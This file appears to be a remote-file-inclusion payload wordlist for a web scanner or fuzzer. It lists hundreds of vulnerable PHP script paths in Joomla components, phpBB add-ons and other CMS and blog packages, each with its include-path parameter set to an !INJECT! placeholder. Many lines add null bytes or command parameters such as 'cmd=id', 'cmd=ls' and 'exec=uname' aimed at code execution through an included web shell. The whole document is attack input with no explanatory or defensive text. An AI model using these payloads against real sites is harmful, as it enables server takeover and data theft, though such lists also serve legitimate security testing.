/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
|
||||
/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
|
||||
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
|
||||
/[path]/mybic_server.php?file=!INJECT!
|
||||
/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
|
||||
/_administration/securite.php?cfg[document_uri]=!INJECT!
|
||||
/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
|
||||
/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
|
||||
/_connect.php?root=!INJECT!
|
||||
/_friendly/core/data/_load.php?friendly_path=!INJECT!
|
||||
/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
|
||||
/_friendly/core/display/_load.php?friendly_path=!INJECT!
|
||||
/_friendly/core/support/_load.php?friendly_path=!INJECT!
|
||||
/_functions.php?prefix=!INJECT!
|
||||
/_includes/settings.inc.php?approot=!INJECT!
|
||||
/_theme/breadcrumb.php?rootBase=!INJECT!
|
||||
/_wk/wk_lang.php?WK[wkPath]=!INJECT!
|
||||
/abf_js.php?abs_pfad=!INJECT!?&cmd=id
|
||||
/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/about.php?bibtexrootrel=!INJECT!?
|
||||
/aboutinfo.php?bibtexrootrel=!INJECT!?
|
||||
/acc.php?page=!INJECT!
|
||||
/access/login.php?path_to_root=!INJECT!
|
||||
/account.php?insPath=!INJECT!
|
||||
/accsess/login.php?path_to_root=!INJECT!
|
||||
/active/components/xmlrpc/client.php?c[components]=!INJECT!
|
||||
/ad_main.php?_mygamefile=!INJECT!
|
||||
/add.cgi.php?blog_theme=!INJECT!
|
||||
/add_link.php?blog_theme=!INJECT!
|
||||
/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
|
||||
/addressbook.php?GLOBALS[basedir]=!INJECT!?
|
||||
/addsite.php?returnpath=!INJECT!
|
||||
/addvip.php?msetstr["PROGSDIR"]=!INJECT!
|
||||
/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
|
||||
/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
|
||||
/admin.loudmouth.php?mainframe=!INJECT!
|
||||
/admin.php?Madoa=!INJECT!?
|
||||
/admin.php?cal_dir=!INJECT!
|
||||
/admin.php?env_dir=!INJECT!
|
||||
/admin.php?lang=!INJECT!
|
||||
/admin.php?page[path]=!INJECT!?&cmd=ls
|
||||
/admin.php?submit=submit&form_include_template=!INJECT!
|
||||
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
|
||||
/admin/ST_countries.php?include_path=!INJECT!?
|
||||
/admin/ST_platforms.php?include_path=!INJECT!?
|
||||
/admin/addentry.php?phpbb_root_path=!INJECT!?
|
||||
/admin/addons/archive/archive.php?adminfolder=!INJECT!
|
||||
/admin/admin.php?path=!INJECT!
|
||||
/admin/admin.php?site_url=!INJECT!
|
||||
/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
|
||||
/admin/admin_news_bot.php?root_path=!INJECT!?
|
||||
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
|
||||
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
|
||||
/admin/admin_users.php?phpbb_root_path=!INJECT!
|
||||
/admin/auth.php?xcart_dir=!INJECT!?
|
||||
/admin/auth/secure.php?cfgProgDir=!INJECT!?
|
||||
/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
|
||||
/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
|
||||
/admin/catagory.php?language=!INJECT!
|
||||
/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
|
||||
/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
|
||||
/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
|
||||
/admin/code/index.php?load_page=!INJECT!
|
||||
/admin/comment.php?config[installdir]=!INJECT!
|
||||
/admin/common-menu.php?CONF[local_path]=!INJECT!
|
||||
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
|
||||
/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
|
||||
/admin/directory.php?config[installdir]=!INJECT!
|
||||
/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
|
||||
/admin/frontpage_right.php?loadadminpage=!INJECT!
|
||||
/admin/header.php?loc=!INJECT!
|
||||
/admin/inc/add.php?format_menue=!INJECT!
|
||||
/admin/inc/change_action.php?format_menue=!INJECT!
|
||||
/admin/include/common.php?commonIncludePath=!INJECT!?
|
||||
/admin/include/header.php?repertoire=!INJECT!?
|
||||
/admin/include/lib.module.php?mod_root=!INJECT!
|
||||
/admin/includes/admin_header.php?level=!INJECT!?
|
||||
/admin/includes/author_panel_header.php?level=!INJECT!?
|
||||
/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
|
||||
/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
|
||||
/admin/index.php?path_to_script=!INJECT!?&cmd=ls
|
||||
/admin/index.php?pg=!INJECT!?
|
||||
/admin/index.php?xtrphome=!INJECT!
|
||||
/admin/index_sitios.php?_VIEW=!INJECT!
|
||||
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
|
||||
/admin/login.php?absolute_path=!INJECT!
|
||||
/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
|
||||
/admin/news.php?language=!INJECT!
|
||||
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
|
||||
/admin/sendmsg.php?config[installdir]=!INJECT!
|
||||
/admin/setup/level2.php?dir=!INJECT!
|
||||
/admin/system/config/conf-activation.php?site_path=!INJECT!
|
||||
/admin/system/include.php?skindir=!INJECT!
|
||||
/admin/system/include.php?start=1&skindir=!INJECT!
|
||||
/admin/system/menu/item.php?site_path=!INJECT!
|
||||
/admin/system/modules/conf_modules.php?site_path=!INJECT!
|
||||
/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
|
||||
/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
|
||||
/admin/themes.php?config[installdir]=!INJECT!
|
||||
/admin/tools/utf8conversion/index.php?path=!INJECT!?
|
||||
/admin/user_user.php?language=!INJECT!
|
||||
/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
|
||||
/admincp/auth/secure.php?cfgProgDir=!INJECT!
|
||||
/adminhead.php?path[docroot]=!INJECT!
|
||||
/admini/admin.php?INC=!INJECT!?
|
||||
/admini/index.php?INC=!INJECT!?
|
||||
/administrator/admin.php?site_absolute_path=!INJECT!?
|
||||
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
|
||||
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
|
||||
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
|
||||
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
|
||||
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
|
||||
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
|
||||
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
|
||||
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
|
||||
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
|
||||
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
|
||||
/administrator/menu_add.php?site_absolute_path=!INJECT!?
|
||||
/administrator/menu_operation.php?site_absolute_path=!INJECT!?
|
||||
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
|
||||
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
|
||||
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
|
||||
/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
|
||||
/adodb/adodb.inc.php?path=!INJECT!
|
||||
/advanced_comment_system/admin.php?ACS_path=!INJECT!?
|
||||
/advanced_comment_system/index.php?ACS_path=!INJECT!?
|
||||
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
|
||||
/agenda.php3?rootagenda=!INJECT!
|
||||
/agenda2.php3?rootagenda=!INJECT!
|
||||
/aides/index.php?page=!INJECT!?
|
||||
/ains_main.php?ains_path=!INJECT!
|
||||
/ajax/loadsplash.php?full_path=!INJECT!
|
||||
/ajouter.php?include=!INJECT!?
|
||||
/akarru.gui/main_content.php?bm_content=!INJECT!
|
||||
/akocomments.php?mosConfig_absolute_path=!INJECT!
|
||||
/amazon/cart.php?cmd=add&asin=!INJECT!
|
||||
/amazon/index.php?lang=!INJECT!
|
||||
/amazon/info.php?asin=!INJECT!
|
||||
/annonce.php?page=!INJECT!?&cmd=id
|
||||
/announcements.php?phpraid_dir=!INJECT!
|
||||
/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
|
||||
/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
|
||||
/api.php?t_path_core=!INJECT!?&cmd=id
|
||||
/apps/apps.php?app=!INJECT!
|
||||
/appserv/main.php?appserv_root=!INJECT!
|
||||
/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
|
||||
/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
|
||||
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
|
||||
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
|
||||
/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
|
||||
/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
|
||||
/archive.php?scriptpath=!INJECT!?
|
||||
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
|
||||
/artlist.php?root_path=!INJECT!
|
||||
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
|
||||
/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
|
||||
/athena.php?athena_dir=!INJECT!
|
||||
/auction/auction_common.php?phpbb_root_path=!INJECT!
|
||||
/auction/includes/converter.inc.php?include_path=!INJECT!?
|
||||
/auction/includes/messages.inc.php?include_path=!INJECT!?
|
||||
/auction/includes/settings.inc.php?include_path=!INJECT!?
|
||||
/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
|
||||
/auth.cookie.inc.php?da_path=!INJECT!
|
||||
/auth.header.inc.php?da_path=!INJECT!
|
||||
/auth.sessions.inc.php?da_path=!INJECT!
|
||||
/auth/auth.php?phpbb_root_path=!INJECT!
|
||||
/auth/auth_phpbb/phpbb_root_path=!INJECT!
|
||||
/authenticate.php?default_path_for_themes=!INJECT!?
|
||||
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
|
||||
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
|
||||
/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
|
||||
/autoindex.php?cfg_file=!INJECT!?
|
||||
/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
|
||||
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
|
||||
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
|
||||
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
|
||||
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
|
||||
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
|
||||
/axoverzicht.cgi?maand=!INJECT!
|
||||
/b2-tools/gm-2-b2.php?b2inc=!INJECT!
|
||||
/b2verifauth.php?index=!INJECT!?
|
||||
/backend/addons/links/index.php?PATH=!INJECT!
|
||||
/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
|
||||
/bb_admin.php?includeFooter=!INJECT!
|
||||
/beacon/language/1/splash.lang.php?languagePath=!INJECT!
|
||||
/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
|
||||
/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
|
||||
/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
|
||||
/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
|
||||
/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
|
||||
/bemarket/postscript/postscript.php?p_mode=!INJECT!
|
||||
/biblioteca/bib_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_save.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/edi_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/edi_save.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/gen_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/gen_save.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/lin_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/lin_save.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/luo_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/luo_save.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/sog_form.php?CLASSPATH=!INJECT!
|
||||
/biblioteca/sog_save.php?CLASSPATH=!INJECT!
|
||||
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
|
||||
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
|
||||
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
|
||||
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
|
||||
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
|
||||
/bild.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/bin/qte_init.php?qte_root=!INJECT!?
|
||||
/bingoserver.php3?response_dir=!INJECT!
|
||||
/block.php?Include=!INJECT!
|
||||
/blocks/birthday.php?full_path=!INJECT!
|
||||
/blocks/events.php?full_path=!INJECT!
|
||||
/blocks/help.php?full_path=!INJECT!
|
||||
/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
|
||||
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
|
||||
/blogcms/index.php?DIR_PLUGINS=!INJECT!?
|
||||
/board/post.php?qb_path=!INJECT!
|
||||
/boitenews4/index.php?url_index=!INJECT!?
|
||||
/books/allbooks.php?home=!INJECT!
|
||||
/books/home.php?home=!INJECT!
|
||||
/books/mybooks.php?home=!INJECT!
|
||||
/bp_ncom.php?bnrep=!INJECT!
|
||||
/bp_ncom.php?bnrep=!INJECT!?
|
||||
/bp_news.php?bnrep=!INJECT!
|
||||
/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
|
||||
/bridge/yabbse.inc.php?sourcedir=!INJECT!
|
||||
/bridges/SMF/logout.php?path_to_smf=!INJECT!
|
||||
/bu/bu_cache.php?bu_dir=!INJECT!?
|
||||
/bu/bu_claro.php?bu_dir=!INJECT!?
|
||||
/bu/bu_parse.php?bu_dir=!INJECT!?
|
||||
/bu/process.php?bu_dir=!INJECT!?
|
||||
/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/builddb.php?env_dir=!INJECT!
|
||||
/button/settings_sql.php?path=!INJECT!
|
||||
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
|
||||
/cal.func.php?dir_edge_lang=!INJECT!
|
||||
/calcul-page.php?home=!INJECT!
|
||||
/calendar.php?cfg_dir=!INJECT!?
|
||||
/calendar.php?lang=!INJECT!
|
||||
/calendar.php?path_to_calendar=!INJECT!
|
||||
/calendar.php?vwar_root=!INJECT!?
|
||||
/calendar/demo/index.php?date=&v=!INJECT!?
|
||||
/calendar/payment.php?insPath=!INJECT!
|
||||
/calendario/cal_insert.php?CLASSPATH=!INJECT!
|
||||
/calendario/cal_save.php?CLASSPATH=!INJECT!
|
||||
/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
|
||||
/cart.php?lang_list=!INJECT!
|
||||
/cart_content.php?cart_isp_root=!INJECT!
|
||||
/catalogg/inludes/include_once.php?include_file=!INJECT!
|
||||
/catalogshop.php?mosConfig_absolute_path=!INJECT!
|
||||
/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
|
||||
/cfagcms/themes/default/index.php?main=!INJECT!
|
||||
/ch_readalso.php?read_xml_include=!INJECT!
|
||||
/challenge.php?vwar_root=!INJECT!
|
||||
/change_preferences2.php?target=!INJECT!?
|
||||
/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/chat.php?my[root]=!INJECT!?cm=id
|
||||
/chat/adminips.php?banned_file=!INJECT!
|
||||
/chat/users_popupL.php3?From=!INJECT!
|
||||
/checkout.php?abs_path=!INJECT!
|
||||
/checkout.php?abs_path=!INJECT!?
|
||||
/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
|
||||
/circ.php?include_path=!INJECT!?
|
||||
/circolari/cir_save.php?CLASSPATH=!INJECT!
|
||||
/citywriter/head.php?path=!INJECT!?
|
||||
/cl_files/index.php?path_to_calendar=!INJECT!?
|
||||
/claroline/auth/ldap/authldap.php?includePath=!INJECT!
|
||||
/claroline/phpbb/page_tail.php?includePath=!INJECT!
|
||||
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
|
||||
/class.mysql.php?path_to_bt_dir=!INJECT!
|
||||
/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
|
||||
/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
|
||||
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
|
||||
/classes/Cache.class.php?rootdir=!INJECT!?
|
||||
/classes/Customer.class.php?rootdir=!INJECT!?
|
||||
/classes/Performance.class.php?rootdir=!INJECT!?
|
||||
/classes/Project.class.php?rootdir=!INJECT!?
|
||||
/classes/Representative.class.php?rootdir=!INJECT!?
|
||||
/classes/User.class.php?rootdir=!INJECT!?
|
||||
/classes/admin_o.php?absolutepath=!INJECT!
|
||||
/classes/adodbt/sql.php?classes_dir=!INJECT!
|
||||
/classes/adodbt/sql.php?classes_dir=!INJECT!?
|
||||
/classes/board_o.php?absolutepath=!INJECT!
|
||||
/classes/class_admin.php?PathToComment=!INJECT!?
|
||||
/classes/class_comments.php?PathToComment=!INJECT!?
|
||||
/classes/class_mail.inc.php?path_to_folder=!INJECT!
|
||||
/classes/common.php?rootdir=!INJECT!?
|
||||
/classes/core/language.php?rootdir=!INJECT!
|
||||
/classes/dev_o.php?absolutepath=!INJECT!
|
||||
/classes/file_o.php?absolutepath=!INJECT!
|
||||
/classes/html/com_articles.php?absolute_path=!INJECT!
|
||||
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
|
||||
/classes/query.class.php?baseDir=!INJECT!
|
||||
/classes/tech_o.php?absolutepath=!INJECT!
|
||||
/classified.php?insPath=!INJECT!
|
||||
/classified_right.php?language_dir=!INJECT!
|
||||
/classifieds/index.php?lowerTemplate=!INJECT!
|
||||
/clear.php?bibtexrootrel=!INJECT!?
|
||||
/clearinfo.php?bibtexrootrel=!INJECT!?
|
||||
/click.php?dir=!INJECT!?
|
||||
/client.php?dir=!INJECT!
|
||||
/client/faq_1/PageController.php?dir=!INJECT!
|
||||
/clients/index.php?src=!INJECT!
|
||||
/cls_fast_template.php?fname=!INJECT!
|
||||
/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
|
||||
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
|
||||
/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
|
||||
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
|
||||
/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
|
||||
/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
|
||||
/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
|
||||
/cms/meetweb/classes/modules.php?root_path=!INJECT!
|
||||
/cms/modules/form.lib.php?sourceFolder=!INJECT!?
|
||||
/cms/system/openengine.php?oe_classpath=!INJECT!???
|
||||
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
|
||||
/cn_config.php?tpath=!INJECT!?
|
||||
/coast/header.php?sections_file=!INJECT!?
|
||||
/code/berylium-classes.php?beryliumroot=!INJECT!?
|
||||
/code/display.php?admindir=!INJECT!?
|
||||
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
|
||||
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
|
||||
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
|
||||
